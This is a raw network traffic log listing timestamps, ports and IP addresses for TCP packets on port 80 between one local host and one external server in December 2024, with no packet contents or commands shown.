Dec 10, 2024 00:42:28.937876940 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.937918901 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.938005924 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.938047886 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.938729048 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.938775063 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.938857079 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.938893080 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.939554930 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.939619064 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.939682007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.939722061 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.940386057 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.940443039 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.940488100 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.940524101 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.941226006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.941267014 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.941283941 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.941315889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.942059040 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.942102909 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.942147017 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.942184925 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.942856073 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.942893982 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.942975044 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.943013906 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.943685055 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.943725109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.943830967 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.943870068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.944525003 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.944562912 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.944608927 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.944648981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.945328951 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.945384979 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.945457935 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.945498943 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.946178913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.946223021 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.946283102 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.946326017 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.947000027 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.947045088 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.947078943 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.947117090 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.947813988 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.947858095 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.947933912 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.947976112 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.948673964 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.948718071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.948795080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.948833942 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.949480057 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.949523926 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.949579954 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.949619055 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.950320005 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.950366974 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.950392962 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.950448036 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.951142073 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.951189995 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.951245070 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.951282978 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.951958895 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.951997995 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.952084064 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.952121019 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.952814102 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.952858925 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.952923059 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.952960968 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.953618050 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.953660011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.953733921 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.953772068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:28.954416037 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:28.954457045 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.046402931 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.046463013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.046494007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.046533108 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.046767950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.046818018 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.046837091 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.046896935 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.047632933 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.047652960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.047681093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.047693968 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.048424006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.048472881 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.048511028 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.048562050 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.049256086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.049300909 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.049391031 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.049444914 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.050095081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.050141096 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.050236940 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.050282955 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.050915956 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.050962925 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.051017046 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.051069975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.051762104 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.051808119 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.051872969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.051917076 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.052592993 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.052637100 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.052694082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.052738905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.053427935 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.053484917 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.053513050 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.053554058 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.054202080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.054250956 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.054317951 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.054367065 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.055061102 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.055108070 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.055166960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.055217028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.055860043 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.055907011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.055964947 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.056010962 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.056690931 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.056742907 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.056787968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.056832075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.057509899 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.057559013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.057634115 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.057681084 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.058362961 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.058413982 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.058423042 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.058468103 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.059194088 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.059242010 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.059269905 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.059317112 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.060009956 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.060058117 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.060127974 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.060173988 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.060861111 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.060925007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.060929060 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.060960054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.061683893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.061726093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.061786890 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.061831951 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.062505960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.062552929 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.062581062 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.062625885 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.063325882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.063374043 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.063446045 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.063493967 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.064162970 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.064214945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.064286947 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.064337969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.064960957 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.065009117 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.122591019 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.122668028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.122697115 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.122740984 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.122963905 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.123014927 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.123085976 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.123136044 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.123814106 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.123872042 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.123930931 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.123972893 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.124633074 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.124691010 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.124721050 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.124764919 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.125447989 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.125494957 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.125569105 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.125622988 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.126266003 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.126317978 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.126374960 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.126425028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.127134085 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.127181053 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.127264977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.127319098 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.127953053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.128000975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.128050089 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.128097057 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.128762007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.128815889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.128947973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.128995895 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.129614115 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.129662991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.129726887 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.129774094 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.130429983 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.130496979 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.130548954 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.130597115 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.131230116 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.131275892 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.131346941 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.131398916 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.132071972 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.132122040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.132205963 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.132256031 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.132895947 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.132951021 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.132993937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.133042097 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.133667946 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.133714914 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.217961073 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.337208033 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.652215958 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.652311087 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.652340889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.652363062 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.652558088 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.652597904 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.652664900 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.652707100 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.652759075 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.652800083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.653501987 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.653548002 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.653599977 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.653645992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.654026985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.654077053 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.654146910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.654194117 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.654890060 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.654961109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.654984951 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.655029058 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.655684948 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.655729055 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.655823946 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.655872107 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.774976015 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.775019884 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.775113106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.775326967 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.775367975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.775451899 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.775499105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.776187897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.776238918 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.776355982 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.776402950 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.776985884 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.777034998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.777082920 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.777127028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.777812958 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.777861118 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.777919054 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.777962923 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.778630018 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.778673887 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.778707981 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.778753996 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.779459000 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.779504061 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.779512882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.779553890 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.780318022 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.780365944 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.780525923 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.780569077 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.781101942 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.781147957 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.781217098 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.781264067 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.781939983 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.781985998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.782046080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.782090902 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.782788038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.782830954 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.782856941 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.782896996 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.783560038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.783612013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.897377968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.897491932 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.897490978 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.897533894 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.897799969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.897851944 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.897871017 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.897910118 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.898607016 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.898776054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.898914099 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.898969889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.899028063 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.899075985 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.899733067 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.899782896 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.899840117 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.899888039 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.900557995 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.900605917 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.900667906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.900715113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.901386023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.901436090 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.901493073 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.901541948 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.902213097 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.902261972 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.902338982 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.902383089 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.903070927 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.903120041 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.903156042 CET	80	49749	185.215.113.206	192.168.2.4
